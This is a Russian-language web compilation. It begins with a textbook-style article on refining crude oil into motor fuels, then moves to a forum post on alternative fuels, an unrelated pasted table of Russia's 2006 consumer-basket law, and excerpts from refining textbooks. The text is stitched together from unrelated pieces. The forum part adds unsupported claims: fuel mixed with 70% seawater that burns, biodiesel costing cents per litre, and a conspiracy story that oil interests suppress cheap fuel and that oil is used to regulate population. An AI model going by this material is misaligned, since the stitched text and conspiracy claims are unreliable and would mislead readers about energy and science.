Топливо из нефти: топливный вариант переработки

Получение автомобильных топлив из нефти

Если вода послужила источником жизни на земле, то о нефти можно сказать, что она стала основным источником «жизни» техники XX века.

Начало использования нефти человеком теряется в глубине веков. Установлено существование нефтяного промысла на берегах Евфрата за 4…6 тыс. лет до нашей эры. Около 700 лет назад Марко Поло при посещении Кавказа обратил внимание на «земляное масло», которое нельзя есть, но можно жечь или лечить с его помощью верблюдов.

Первым целевым продуктом, выработанным из нефти, стал керосин. В 1823 г. русские мастеровые братья Дубинины построили простейшую нефтеперегонную установку для получения керосина (рис. 4).

Однако значение нефти в качестве источника энергии человечество впервые поняло в начале XX века, когда в качестве топлива для паровых котлов и двигателей внутреннего сгорания стали широко применять нефть и нефтепродукты. Во время Первой мировой войны 1914 г.

бытовала крылатая фраза «Союзники пришл-и к победе на гребне нефтяной волны».

Рекламные предложения на основе ваших интересов:

Нефть представляет собой вязкую, несколько маслянистую жидкость темно-коричневого, иногда зеленоватого цвета. Плотность нефтей колеблется от 820 до 900 кг/м3, хотя на отдельных месторождениях добывают более легкие или тяжелые нефти.

В состав нефти входят следующие химические элементы: углерод (82…87%), водород (11…14%), сера (0,1… 7%), азот (0,001… 1,8%), кислород (0,05… 1%). Основными компонентами нефти являются углеводороды — алка-ны, циклоалканы и арены. Алканы (парафиновые углеводороды) имеют общую эмпирическую формулу С,,Н2„+2.

Они характеризуются предельным насыщением водородом, в связи с чем известны также под названием предельных углеводородов. Плотность и температура кипения парафинов повышаются с ростом молекулярной массы. Поэтому парафиновые углеводороды с числом атомов 16 и выше представляют собой твердые вещества и находятся в нефти в растворенном состоянии.

Содержание парафинов в нефтях равно 30…35%, однако в некоторых случаях может доходить до 50%.

Рис. 1. Нефтеперегонная установка братьев Дубининых, 1823 г: 1 — нефть; 2 — вода; 3 — керосин

В среднем в нефтях содержится от 25 до 75% циклоалканов. Арены (ароматические углеводороды) отличаются наличием в молекуле группы атомов углерода, называемых бензольным кольцом. Нефти содержат 10… 20% аренов, которые обычно представлены бензолом, его гомологами и производными нафталина.

Наряду с углеводородами нефть содержит различные сернистые соединения, органические кислоты, азотистые соединения, а также асфальто-смолистые вещества. Ряд из них несмотря на незначительное содержание оказывают отрицательное влияние на свойства нефтяных топлив.

Так, некоторые из сернистых соединений ведут к проявлению сильного коррозионного воздействия на металлы. Наличие органических кислот, получивших название нафтеновых, также способствует коррозии металлических изделий.

Особенностью асфальто-смолистых веществ является склонность к отложениям и повышенным нагарам.

В процессах переработки нефти образуются непредельные соединения. Такими соединениями являются, например, олефиновые углеводороды. Для непредельных углеводородов характерна низкая химическая стойкость, в связи с чем их присутствие в нефтепродуктах нежелательно.

При разнообразии содержащихся углеводородов особенностью нефти является также широкий температурный диапазон выкипания. Уже при нагреве до 30…40 °С из нефти начинают испаряться наиболее легкие углеводороды.

С повышением температуры состав выкипающих углеводородов становится тяжелее. Это позволяет разделить нефть на части или фракции, выкипающие в определенных температурных пределах.

Получаемые продукты называют дистиллятами, а сам процесс — прямой перегонкой нефти.

Обычно выделяют дистилляты со следующими пределами выкипания:
Бензиновый……….28…180 °С
Лигроиновый …. 110…230 °С
Керосиновый …. 120…315 °С
Газойлевый……….230…330 °С
Соляровый……….280…380 °С

Масляный……….320…500 °С

Прямая перегонка является первичным и обязательным процессом переработки нефти в топлива и масла. Она осуществляется путем испарения нефти в трубчатых печах с последующим разделением фракций в ректификационных колоннах. В трубчатой печи нефть нагревается до температуры 330…350 °С и затем подается в среднюю часть ректификационной колонны.

Жидкий остаток стекает вниз, а углеводородные пары поднимаются вверх и конденсируются по пути в виде дистиллятов на так называемых ректификационных тарелках. Эти тарелки установлены на различной высоте колонны. На первых тарелках конденсируются тяжелые углеводороды, несколько выше — более легкие.

Наиболее легкие углеводороды отводятся с верха колонны в газообразном виде.

В атмосферной ректификационной колонне получают топливные дистилляты. После перегонки остается мазут, который может подвергаться дальнейшему разделению либо использоваться на установках крекинга или в качестве топлива (топочного мазута).

Нефтяные смеси термически нестойкие, в связи с чем во избежание их разложения при перегонке мазутов применяют вакуум, снижающий температуру кипения. Испарение мазутов осуществляют в вакуумных трубчатых установках, а их разделение — в вакуумных ректификационных колоннах.

В верхней части вакуумной колонны конденсируются соляровые фракции, ниже — масляные, идущие на приготовление товарных масел. Жидкий остаток наиболее, тяжелых фракций мазута — полугудрон или гудрон — собирается в нижней части вакуумной колонны.

Рис. 2. Получение автомобильных топлив и масел из нефти

Рис. 3. Принципиальная схема нефтеперегонной установки: 1 — трубчатая печь; 2 — испарительная колонна; 3 — ректификационная колонна; 4 — теплообменник; 5 — холодильник

Для улучшения эксплуатационных свойств нефтепродукты подвергаются специальной очистке. Например, для удаления сернистых, азотистых, кислородных, металло-органических и непредельных соединений используется гидроочистка.

В процессе гидроочистки соединения, содержащие серу, азот или кислород, путем реакции с водородом переводятся в газообразные, легко удаляющиеся продукты. Гидроочистка проводится при температуре 350…420 °С и давлении 1,7…4,0 МПа в присутствии катализаторов.

Гидроочистку применяют для обессеривания дизельных топлив, для очистки масел, а также при подготовке сырья для некоторых вторичных процессов переработки нефти.

Для удаления из топливных дистиллятов некоторых кислородных и сернистых соединений применение находит также очистка щелочью. Этот процесс заключается в добавлении щелочи в очищаемый нефтепродукт с последующим удалением водных растворов образующихся веществ совместно с остатками щелочи.

При разгонке ряда нефтей в получаемых высококипя-щих топливных и масляных дистиллятах содержится большое количество соединений, застывающих при сравнительно высоких температурах. К этим соединениям относятся главным образом парафиновые и некоторые циклические углеводороды.

Их наличие ухудшает эксплуатационные свойства нефтепродуктов при пониженных температурах применения. Для удаления этих углеводородов используются различные методы депарафинизации. При производстве дизельных топлив зимних сортов распространение получила так называемая карбамидная депара-финизация.

Этот метод основан на свойстве карбамида (мочевины) образовывать комплексные соединения с парафинами, которые достаточно просто отделяются от остальных углеводородов.

Депарафинизация масляных дистиллятов осуществляется с помощью их охлаждения до низких температур с последующим отделением образующихся твердых кристаллов углеводородов на специальных фильтрах-прессах.

Прямая перегонка нефти обеспечивает лишь ограниченное количество топливных дистиллятов, не удовлетворяющих постоянно растущий спрос на моторное топливо.

Большинство нефтей содержит 15…20% бензиновых дистиллятов и 45…55% фракций, перегоняющихся до 300…350 °С.

Поэтому для получения большего количества (увеличения выхода) моторных топлив (в первую очередь бензинов) используются методы химической переработки нефти, получившие название вторичных процессов.

Наибольшую известность получил крекинг-процесс, заключающийся в расщеплении крупных молекул под действием высоких температур (термический крекинг) или в присутствии катализатора (каталитический крекинг). Из-за невысокого качества бензинов термического крекинга в настоящее время используются главным образом процессы каталитического крекинга.

Каталитический крекинг проводится при температуре 450… 530 °С и давлении 0,07…0,3 МПа. В качестве катализатора обычно применяются алюмосиликаты (75…80% окиси кремния и 10…20% окиси алюминия). С помощью каталитического крекинга получают бензин с октановым числом до 85 ед.

и керосино-газойлевые фракции, используемые в качестве реактивного и дизельного топлива.

Процесс, сочетающий крекирование и гидрирование (присоединение водорода), получил название гидрокрекинга.

Гидрокрекинг проводится при температуре 360…440 °С под давлением 15…17 МПа в присутствии водородосодержащего газа.

В зависимости от условий процесса и типа сырья гидрокрекинг позволяет получить из керосино-соляровых фракций, вакуумных дистиллятов и остаточных продуктов бензины, реактивные и дизельные топлива.

Для улучшения одного из важнейших эксплуатационных свойств бензина — стойкости к детонации — используются процессы риформинга. Различают два вида рифор-минга: термический и каталитический.

Наиболее широкое-применение в промышленности нашел каталитический риформинг, позволяющий из прямогон-ного бензина получить риформинг-бензин.

Этот бензин содержит значительное количество (65…75%) ценных ароматических углеводородов, что позволяет их использовать для повышения детонационной стойкости товарных бензинов.

Каталитический риформинг протекает в среде водорода при температуре 500…540 °С, давлении 1,5…4 МПа и в присутствии катализатора. В качестве катализатора промышленное применение получила платина на окиси алюминия, отчего такой процесс получил название платфор-минга.

Компоненты бензинов с высокой детонационной стойкостью получают также с помощью процессов алкилиро-вания и изомеризации. Алкилирование представляет собой реакцию введения алкильных радикалов в органическое соединение.

Путем алкирования вырабатывают ценные компоненты бензинов, известные под названием алкилата и алкилбензола.

Изомеризация ведет к перегруппировке атомов в молекуле с образованием молекулы с изоструктурой, которая обеспечивает необходимые свойства топлива.

Очистка и вторичные процессы существенно улучшают эксплуатационные свойства топлив, однако недостаточны для удовлетворения всех требований двигателей современных автомобилей.

Поэтому на заключительном этапе производства топлива после смешения продуктов прямой перегонки и вторичных процессов осуществляется добавление различных присадок.

Присадки это вещества, добавка которых в небольших количествах существенно улучшает один или ряд показателей эксплуатационных свойств нефтепродуктов.

Производство нефтепродуктов и нефтехимического сырья из нефти осуществляется на нефтеперерабатывающих заводах (НПЗ). При переработке нефти применяются различные технологические процессы, тип и режимные условия которых определяются специализацией завода и характеристиками используемого сырья — нефти.

До недавнего времени НПЗ топливной специализации строились по схеме неглубокой переработки, при которой из каждой тонны нефти производится в среднем 15% бензина, 22% дизельного топлива и свыше 40% топочного мазута.

Для более рационального использования нефтяного сырья в настоящее время осуществляется строительство установок для углубленной переработки нефти с использованием различных вторичных процессов, что позволит довести выработку автомобильного топлива до 55…60%.

Рекламные предложения:

Читать далее: Особенности производства смазочных материалов

Категория: — Автомобильные эксплуатационные материалы

Главная → Справочник → Статьи → Форум

Источник: http://stroy-technics.ru/article/poluchenie-avtomobilnykh-topliv-iz-nefti

Альтернативное топливо не из нефти

Материал очень похож и наводит на мысль , что топливу быть.Ему быть так как люди ищут его . Люди эксперементируют.Это топливо дешевле чем нефть .Оно давно открыто , но ему не дают хода .

Не дают те кто греет руки на нефти , присвоив себе право это делать.

Биогаз представляет собой один из продуктов анаэробного (без доступа кислорода) брожения органических отходов.

При соблюдении оптимального температурного режима брожения, постоянным перемешивании сырья, своевременной загрузке исходного и выгрузке сброженного материала выход биогаза достигает 1-2 м3 с 1 м3 реактора, а при использовании птичьего помета 4 м3.

Можно привести и более доступный для понимания расчет: одна корова может обеспечить 1,5-2 м3 газа в сутки, бык на откорме – 1,0 м3, свинья – 0,2 м3, птица – 0,015 м3.

Биогаз содержит 55 — 70% метана и 26 — 44% углекислого газа, теплотворная способность 1м3 составляет 20 — 25 МДЖ/ м3, что эквивалентно сгоранию 0,6 литра бензина; 0,85 литра спирта; 1,7 кг. дров или использованию 1,4 кВт электроэнергии. Биогаз может быть использован в любых газовых приборах.

  • использования внешних источников энергии.
  • Зависимость от дорогого импортного газа заставила черниговского изобретателя искать альтернативные источники горючего:

Газоэлектрогенератор мощностью 30 кВт, установленный на базе Ассоциации «Фермер» в с. Петровка Московской области Кыргызской Республики, полностью обеспечивает энергетические нужды нескольких крестьянских хозяйств.Биогаз можно использовать и в качестве топлива для автомобильных двигателей. Эффективность биогаза в этом случае зависит от содержания метана и наличия примесей. На метане могут работать как карбюраторные, так и дизельные двигатели, но поскольку газ является высокооктановым топливом, более эффективно его использование в дизельных двигателях. Биогаз, получаемый на установке Ассоциации «Фемер» используется для заправки 2 карбюраторных автомобилей.Кроме вышеперечисленных методов использования биогаза существуют большие возможности использования составляющих газов – метана и углекислого газа для промышленного производства сухого льда, ацетилена, формальдегида, хлористого метана, метилена, хлороформа и четыреххлористого углерода, а также других ценных химических продуктов.Из одной тонны птичьего помета в биогазовой установке можно получить 130 куб.м биогаза.Биогаз близок по своим характеристикам кприродному газу. Синонимами для биогазаявляются такие слова, как газ-метан,канализационный газ или болотный газ.Его можно:- использовать как природный газ;- накапливать, перекачивать;- сжигать для производства тепловой иэлектрической энергии;- использовать для заправки автомобилей.Биогазовая установка на птицекомплексе поможет снизить долю энергетических затратсебестоимости готовой продукции, обеспечить птицекомплекс энергетическими ресурсами без

http://video.yandex.ru/redir/search/?url=http%3A%2F%2Frutube…

AHTUNG >Эта страница будет целиком посвещенаАЛЬТЕРНАТИВНОМУ ТОПЛИВУАтомная мини-электростанция появится в продаже в 2013 годуУченые из Лос Аламоса (США) заявили, что уже в ближайшие 5 лет в продаже появятся атомные мини-электростанции, способные обеспечивать электричеством более 20.000 домов.

Лос Аламос  знаменит на весь мир тем, что именно там находятся правительственные лаборатории,  в которых когда-то была разработана первая атомная бомба.

 Миниатюрный реактор будет размером с небольшой фруктовый сад, и на его территории не будет ни одной переносной детали, что делает воровство практически невозможным, а наиболее важные функционирующие элементы реактора будут расположены под землей.

 Правительство США выдало лицензию компании Hyperion, которая на прошлой неделе заявила, что уже начала прием заказов на реакторы и планирует начать их массовое производство в течение пяти лет.

 «Наша цель состоит в том, чтобы генерировать электричество за 10 центов за ватт, такого нет нигде в мире», — заявил Джон Дил, исполнительный директор Hyperion.

 «Мини-электростанция будет стоить приблизительно 25 миллионов долларов, что для населенного пункта хотя бы с 10 тысячами домов вовсе не дорого — по 250 долларов с каждого», — продолжил представитель компании. Дил утверждает, что у его компании есть уже более 100 заказов, большинство из которых поступило от компаний нефтяной и электроэнергетической отраслей. Компания планирует создать три фабрики для производства 4.000 реакторов между 2013 и 2023 годами. «Мы уже разработали трубопровод для 100 реакторов. Это настоящий прорыв», — добавил Дил.  по информации mignews.com

http://nauka21vek.ru/archives/576 Группа ученых сообщила о создании высококачественного биодизельного топлива из кофейной гущи, продажа биодизеля, изготовленного из выбрасываемой кофейной гущи из американской сети кафе «Старбакс» (Starbucks) за год может принести 8 миллионов долларов прибыли, сообщает в среду Environmental News Network.

«Биодизельное топливо, сделанное на основе кофейной гущи, имеет более долгий срок хранения, чем другие виды биотоплива из-за большого количества содержащихся в кофе антиокислителей. Еще одно преимущество: на конечном этапе создания топлива из кофе оставшиеся отходы могут быть превращены в брикетное топливо для печей, каминов и котлов», — говорится в опубликованных результатах эксперимента.

Учитывая, что сеть кафе Starbucks выбрасывает в США 96 тысяч тонн кофейной гущи ежегодно, исследователи установили, что из этого количества можно выработать 40 тысяч литров биодизеля и 80 тонн брикетного топлива.

За вычетом себестоимости и после торговой наценки цена нового вида биодизеля составит примерно три цента за литр и 225 долларов за тонну брикетного топлива, расчетная прибыть от продажи может составить до 8 миллионов долларов.

Таким образом, образуется замкнутый круг полностью безотходного производства, отмечают ученые.Одно из главных преимуществ биодизеля — более низкая цена по сравнению с другими источниками энергии. Чтобы снизить цену производства биодизельного топлива многие промышленные предприятия используют отходы переработки нефти и газа и остатки масла после жарки продуктов в промышленных масштабах.

Исследователи из отдела исследований химических материалов Невадского университета (США) полагают, что биодизельное топливо из кофейной гущи будет удовлетворять всем существующим к таким видам продукции требованиям.

по информации rian.ru Россия: биотопливо будут делать из морской воды Специалисты научно-исследовательского центра «АКМАС» во Владивостоке (Россия) разработали метод получения биотоплива из морской воды. Об этом сообщил генеральный директор центра Валерий Цымбаленко. «Сейчас все говорят о биотопливе, как об экологически чистом продукте.

В Европа его делают из рапса, из пшеницы, в Америке — из кукурузы, в Юго-Восточной Азии — из риса. Но все это продукты питания, цены на которые будут расти, так же, как и на углеводороды. Например, в Приморье собираются к форуму АТЭС построить завод по производству биотоплива из сои, который будет перерабатывать 40 тыс. т сои в год.

Жалко сою! Мы предлагаем подойти с другой стороны. Мы живем у моря, и предлагаем использовать для производства биотоплива цианобактерии, содержащиеся в морской воде», — сказал В. Цымбаленко. Как пояснил ученый, сотрудниками центра создан препарат, который положительно влияет на развитие цианобактерий.

«Углеводородами в нашем топливе являются цианобактерии, сгорает не вода, не добавленные 3-5% дизельного топлива или бензина, а именно бактерии. В полученное нами биотополиво можно добавить 70% морской воды, компоненты смешаются, и состав будут гореть.

Это новая жидкость, которая не попадет ни под какие ТУ, ее можно использовать для отопления в котельных ЖКХ», — подчеркнул В. Цымбаленко. По мнению руководителя, морская вода пока что почти ничего не стоит, поэтому не будет расти в цене. «Себестоимость нашего продукта равна 3 руб. Стоимость может равняться максимум 13 руб.

И эта стоимость расти не будет, в отличие от показателей наших конкурентов — производителей бензина и других видов топлива», — сказал В. Цымбаленко. 

FuelAlternative/Деловой мир

Генератор органической солярки5 ноября 2008 просмотров 429 Комментариев нет Обнаружение организма, способного производить дизельное топливо в качестве побочного продукта жизнедеятельности, ставит под сомнение текущую концепцию формирования нефти на планете.

 Исследовательская группа американских учёных под руководством Гэри Штробеля (Gary Strobel) из университета штата Монтана в г.

Бозман обнаружила, что грибок вида Gliocladium roseum (NRRL 50072), развивающийся на растениях вида Eucryphia cordifolia способен производить широкий спектр углеводородов, входящих в состав нефти.

 Тем самым обозначается не только перспектива создания простого естественного генератора дизельного топлива. Появляется основание для пересмотра моделей образования нефти вообще. Исследования и разработки — R&D.CNews.

http://altenergysource.ru/generator-organicheskoj-solyarki.h…

 Я думаю, что эти статьи произвели впечатления, но к сожалению у меня не сохранился журнал «Техника Молодёжи». В этом журнале описывается способ получения газа при помощи бактерий.

Бактерии заселялись в пруд и с площади в один квадратный километр  можно было столько получить газа сколько надо для суточного пробега  80-ти тысячного парка машин.

Если во Владивостоке определили себестоимость литра бензина в три рубля, а количество воды в океане больше чем во всех месторождениях нефти на земле, то почему же до сих пор дерутся из-за нефти? Ответ на этот вопрос надо искать в количествах «КУ» которые надо отдавать шарлатанам всех мастей, которые во что бы то ни стало хотят быть первыми и править миром. Нефть — это инструмент при помощи которого можно регулировать численность населения.Присвоив себе  в единолчное пользованиенедра земли — нам диктуют как мы должны жить .

 Вот по этой причине разработка альтернативного топлива так мало освещается. Ведь если нефть ничего не будет стоить, то труд человека выйдет на первое место по стоимости и тогда придётся считаться с населением, которое сейчас можно разводить как скотину. 

31 марта 2006 года    N 44-ФЗ  РОССИЙСКАЯ ФЕДЕРАЦИЯ   ФЕДЕРАЛЬНЫЙ ЗАКОН   О ПОТРЕБИТЕЛЬСКОЙ КОРЗИНЕ В ЦЕЛОМ ПО РОССИЙСКОЙ фЕДЕРАЦИИ  Принят Государственной Думой 10 марта 2006 года  Одобрен Советом Федерации 24 марта 2006 года  Статья 1  Потребительская корзина для основных социально-демографических групп населения (трудоспособное население, пенсионеры, дети) в целом по Российской Федерации определяется не реже одного раза в пять лет и устанавливается в следующих составе и объемах (в натуральных показателях):  1. Продукты питания +—————+——————-+——————————+¦ Наименование ¦ Единица измерения ¦Объем потребления (в среднем ¦¦              ¦                   ¦  на одного человека в год)  ¦¦              ¦                   +———+———-+———+¦              ¦                   ¦трудоспо-¦пенсионеры¦  дети  ¦¦              ¦                   ¦собное   ¦          ¦        ¦¦              ¦                   ¦население¦          ¦        ¦+—————+——————-+———+———-+———+ Хлебные                кг            133,7      103,7     84,0 продукты (хлеб и макаронные изделия в пересчете на муку, мука, крупы, бобовые)  Картофель              кг            107,6       80,0    107,4  Овощи                  кг             97,0       92,0    108,7 и бахчевые  Фрукты свежие          кг             23,0       22,0     51,9  Сахар                  кг             22,2       21,2     25,2 и кондитерские изделия в пересчете на сахар  Мясопродукты           кг             37,2       31,5     33,7  Рыбопродукты           кг             16,0       15,0     14,0  Молоко и               кг            238,2      218,9    325,2 молокопродукты в пересчете на молоко  Яйца                  штука          200,0      180,0    193,0  Масло                  кг             13,8       11,0     10,0 растительное, маргарин и другие жиры  Прочие                 кг              4,9        4,2      3,6 продукты (соль, чай, специи)——————————————————————  2. Непродовольственные товары +——————+—————+——————————+¦   Наименование   ¦    Единица    ¦Объем потребления (в среднем ¦¦                  ¦   измерения/  ¦     на одного человека)     ¦¦                  ¦  срок износа  +———+———-+———+¦                  ¦               ¦трудоспо-¦пенсионеры¦  дети  ¦¦                  ¦               ¦собное   ¦          ¦        ¦¦                  ¦               ¦население¦          ¦        ¦+——————+—————+———+———-+———+ Верхняя пальтовая      штук/лет      3/7,6      3/8,7    3/2,6 группа  Верхняя костюмно-      штук/лет      8/4,2      8/5,0   11/2,0 платьевая группа  Белье                  штук/лет      9/2,4     10/2,9   11/1,8  Чулочно-носочные       пар/лет       7/1,4      4/1,9    6/1,3 изделия  Головные уборы         штук/лет      5/5,0      4/5,6    4/2,8 и галантерейные изделия  Обувь                  пар/лет       6/3,2      6/3,5    7/1,8  Школьно-письменные     штук/лет      3/1,0      3/1,0   27/1,0 товары  Постельное белье       штук/лет     14/7,0     14/7,0   14/7,0  Товары культурно-      штук/лет    19/10,5    19/10,5  19/10,5 бытового и хозяйственного назначения  Предметы первой    процентов от       10         15       12 необходимости,     общей величины санитарии          расходов на и лекарства        непродоволь-                    ственные товары                    в месяц——————————————————————  3. Услуги +—————+——————-+—————————-+¦  Наименование ¦ Единица измерения ¦Объем потребления (в средне즦               ¦                   ¦     на одного человека)    ¦¦               ¦                   +———+———-+——-+¦               ¦                   ¦трудоспо-¦пенсионеры¦  дети ¦¦               ¦                   ¦собное   ¦          ¦       ¦¦               ¦                   ¦население¦          ¦       ¦+—————+——————-+———+———-+——-+ Жилье              кв. м общей         18         18       18                     площади  Центральное         Гкал в год          6,7        6,7      6,7 отопление  Холодное            л в сутки         285        285      285 и горячее водоснабжение и водоотведение  Газоснабжение      куб. м в месяц      10         10       10  Электроэнергия     кВт.ч в месяц       50         50       50  Транспортные       поездок в год      619        150      396 услуги  Услуги культуры  процентов от общей     5          5        5                  величины расходов                  на услуги в месяц  Другие виды      процентов от общей    15         15       15 величины расходов/>——————————————————————  Статья 2  1. Настоящий Федеральный закон вступает в силу со дня его официального опубликования. 2. Действие настоящего Федерального закона распространяется на правоотношения, возникшие с 1 января 2005 года.  Президент   Российской Федерации   В.ПУТИН 

Москва, Кремль  31 марта 2006 года  N 44-ФЗ

http://www.cozenostra16.narod.ru/p1.htm

Эдуард Куликов мастер

  • Активность: 1135
  • Репутация: 89
  • Пол: Мужчина

Эдуард Куликов мастер

Источник: https://interesnosti.com/58380814876937117/alternativnoe-toplivo-ne-iz-nefti/

ПОИСК

Фиг. 107. Топливный вариант переработки нефти.

    Выбор направления переработки нефти и ассортимента пол ча-емых нефтепродуктов определяется физико-химическими свойствами нефти, уровнем развития техники нефтепереработки и потребностями в товарных нефтепродуктах данного экономического района. Различают три основных варианта переработки нефти 1) топливный 2) топливно-масляный 3) нефтехимический (комплексный). [c.151]

    В зависимости от варианта переработки нефти получают различный ассортимент топливных и масляных фракций. На установках АТ при неглубоком топливном варианте и на атмосферных блоках установок АВТ по топливно-масляному варианту переработки получают бензиновые, керосиновые и дизельные фракции при глубоком топливном варианте переработки нефти на атмосферном блоке установки АВТ получают бензиновые и керосино-газойлевые фракции. Утяжеленный по составу мазут подвергается дальнейшей переработке на блоках вакуумной перегонки с получением одной или нескольких масляных фракций и гудрона. [c.147]

    При топливно-масляном варианте переработки нефти и наличии па заводе установок каталитического крекинга и АВТ большой единичной мощности целесообразно использование комбинированной технологической схемы установки первичной перегонки нефти, обеспечивающей одновременное или раздельное получение из нефти наряду с топливными фракциями широкой и узких масляных фракций [1]. [c.147]

    Полные данные по характеристике состава и свойств нефтей позволяют решать главные вопросы переработки проводить сортировку нефтей на базах смешения, определять варианты переработки нефти (топливный, топливно-масляный или нефтехимический), выбирать схемы переработки, определять глубину отбора топливных или масляных фракций от потенциала и выход отдельных фракций (продуктов переработки). Отметим, что необходимая глубина отбора топливных или масляных фракций от потенциала определяется требуемым качеством остатка. [c.36]

    В зависимости от направления использования фракций установки перегонки нефти принято именовать топливными, масляными или топливно —масляными и соответственно этому — варианты переработки нефти. [c.181]

    Направление переработки нефти обычно выбирают с учетом народно-хозяйственных потребностей района, прилегающего к НПЗ, что позволяет уменьшить затраты на транспортирование полученной продукции.

Наименьшее число фракций отбирается при чисто топливном варианте переработки.

Это — бензин, керосин, дизельное топливо, вакуумный газойль — сырье для каталитического крекинга или гидрокрекинга, и остаток, добавляемый в котельное топливо либо используемый как сырье для установок коксования, гидрокрекинга, получения битума.

Переработка нефти по топливному варианту может быть глубокой и неглубокой. При глубокой переработке стремятся получить максимальный выход суммы светлых, при неглубокой — котельных топлив. В последнем варианте установка первичной перегонки состоит только из атмосферной части. [c.27]

    Сравнение вариантов переработки нефти на НПЗ топливного профиля [c.60]

    Здесь не приведены схемы топливно-масляных вариантов переработки нефти, так как они рассматриваются в III части курса Технология переработки иефти и газа . [c.310]

    Настоящая книга не претендует на полный анализ состояния нефтеперерабатывающей промышленности США и стран бывшего СССР. Основной материал посвящен развитию топливного варианта переработки нефти как одного из самых многотоннажных в мире.

Серьезные изменения, которые происходят в России и странах-бывших республиках, позволяют с надеждой смотреть в завтрашний день. Совершенно ясно, что нынешнее состояние нефтеперерабатывающей промышленности бывшего [c.

293]

    Исключение подачи водяного пара в вакуумную колонну ( сухая вакуумная перегонка) было использовано в промышленных условиях и при топливном варианте переработки нефти для углубления отбора вакуумного газойля и сокращения диаметра колонны за счет исключения водяных паров.

Однако, как оказалось, для углубления отбора вакуумного газойля при сухой вакуумной перегонке потребовалось уменьшить остаточное давление на верху колонны с 5-6 кПа до 1-1,5 кПа, а это вызвало увеличение энергозатрат на эжекцию (создание такого низкого давления) и не повлекло за собой изменения диаметра колонны, так как при более низком давлении увеличился удельный объем нефтяных паров. [c.462]

    ПЕРЕРАБОТКА НЕФТИ ПО ТОПЛИВНОМУ ВАРИАНТУ Варианты переработки нефтей [c.13]

    Технологические схемы установок первичной перегонки нефти обычно принимаются для определенного варианта переработки нефти — топливного или топливно-масляного (рис. П1-1). [c.147]

    В нефтеперерабатывающей промышленности СССР и стран Западной Европы длительное время преобладал топливно-масляный вариант переработки нефти, при котором фракции прямогонного бензина по балансу нефтепродуктов оказывались в относительном избытке и передавались в нефтехимию для производства этилена. В структуре сырья пиролиза в СССР в 1985 г. 77% составляли бензины, 16% — сжиженные газы, 7%-—этан и сухой газ. По мере роста масштабов и глубины [c.11]

    По топливно-масляному варианту переработки нефти наряду с моторными топливами получают различные сорта смазочных масел. Для производства последних подбирают обычно нефти с высоким потенциальным содержанием масляных фракций с учетом их качества. [c.108]

    Ассортимент продуктов вакуумной перегонки мазута зависит от варианта переработки нефти. Существуют две схемы переработки мазута масляная и топливная. При масляной схеме получают несколько фракций — вакуумных дистиллятов, при топливной — одну. [c.125]

    По топливно-масляному варианту переработки в вакуумной колонне отбирают три-четыре масляные фракции. Как при топливном, так и при нефтехимическом вариантах переработки нефти в схему АВТ включают вторичную перегонку бензина с получением сырья для каталитического риформинга или для выделения бензольной, толуольной и ксилольной фракций. [c.27]

    Комплексная схема нефтеперерабатывающей промышленности Азербайджана, по существу, представляет собой совокупность двух вариантов переработки нефти топливного и топливно-масляно-асфальтового, которые сводятся к следующему (см. рис. I). [c.119]

    Существует много вариантов технологических схем НПЗ. Однако в общем виде они могут быть разделены на две группы топливную и топливно-масляную.

При топливной схеме переработки нефти основной задачей является получение топлив различного качества — карбюраторных, дизельных, реактивных, котельных.

При переработке нефти по топливно-масляному варианту на НПЗ наряду с топливами вырабатывают масла различного назначения — моторные, индустриальные, цилиндровые, электроизоляционные и др. [c.4]

    По топливному варианту нефть перерабатывают в основном на моторные и котельные топлива. При одной и той же мощности завода по нефти топливный вариант переработки отличается наименьшим числом технологических установок и низкими капиталовложениями. Переработка нефти по топливному варианту может быть глубокой и неглубокой.

При глубокой переработке нефти стремятся получить максимально возможный выход высококачественных авиационных и автомобильных бензинов, зимних и летних дизельных топлив и топлив для реактивных двигателей. Выход котельного топлива в этом варианте сводится к минимуму.

Таким образом, предусматривается такой набор процессов вторичной переработки, при котором из тяжелых нефтяных фракций и остатка — гудрона получают высококачественные легкие моторные топлива.

Сюда относятся каталитические процессы — каталитический крекинг, каталитический риформинг, гидрокрекинг и гидроочистка, а также термические процессы, например коксование Переработка заводских газов в этом случае направлена на увеличение выхода высококачественных бензинов. При неглубокой переработке нефти предусматривается высокий выход котельного топлива. [c.151]

    Переработка нефти по топливному варианту может быть глубокой и неглубокой. При глубокой переработке стремятся получить максимальный выход суммы светлых, при неглубокой — котельных топлив в последнем случае установка первичной перегонки состоит только из атмосферной части.

По топливно-масляному варианту переработки в вакуумной колонне отбирают три — четыре масляные фракции.

Как при топливном, так и при нефтехимическом вариантах переработки нефти, в схему АВТ включают вторичную перегонку бензина с получением сырья для каталитического риформинга или для выделения бензольной, толуольпой и кси-лольной фракций. [c.10]

    Какие варианты переработки нефти (топливные или масляные) более опасны для окружающей среды  [c.40]

    Один из путей переработки нефти — топливный вариант переработки сернистых, смолистых нефтей Второго Баку и других нефтей, не содержащих масляных фракций, заключается в следующем. Из нефтяного сырья получают возможно большее количество авиационных, автотракторных, дизельных и других специальных топлив. Выход котельного топлива сводят к минимуму. [c.227]

    Направление переработки нефти обычно выбирают с учетом народно-хозяйственных потребностей района, прилегающего к НПЗ, что позволяет уменьшить затраты на транспортирование полученной продукции.

Наименьшее число фракций отбирается при чисто топливном варианте переработки (бензин, керосин, дизельное топливо, вакуумный газойль — сырье для каталитического крекинга или гидрокрекинга и остаток, добавляемый в котельное топливо или используемый как сырье установок коксования, гидрокрекинга, получения битума). [c.10]

    Ассортимент продуктов, получаемых при вакуумной перегонке мазута, зависит от варианта переработки нефти. Существуют две схемы переработки мазута масляная и топливная. [c.116]

    Существуют три основных варианта переработки нефти топливный топливно-масляный и комплексный, включающий получение сырья для НХС. [c.197]

    В зависимости от варианта переработки нефти получают различный ассортимент топливных и масляных фракций, а на установках АТ при неглубоком топливном варианте получают компоненты моторных топлив и в остатке мазут (котельное топливо). [c.333]

    При топливно-масляном варианте переработки нефти и наличии на заводе установок каталитического крекинга и АВТ большой единичной мощности целесообразно использование комбинированной технологической схемы установки первичной перегонки нефти, обеспечивающей одновременное или раздельное получение из нефти наряду с топливными фракциями широкой и узких масляных фракций. Принципиальные технологические схемы таких установок приведены на рис. 8.2 и 8.3. [c.334]

    По топливно-масляному варианту переработки нефти наряду с топливами получают смазочные масла. Для производства смазочных масел обычно подбирают нефти с высоким потенциа.яьным содер-жание.м масляных фракций. В этом случае для выработки высококачественных масел требуется минимальное число технологических установок.

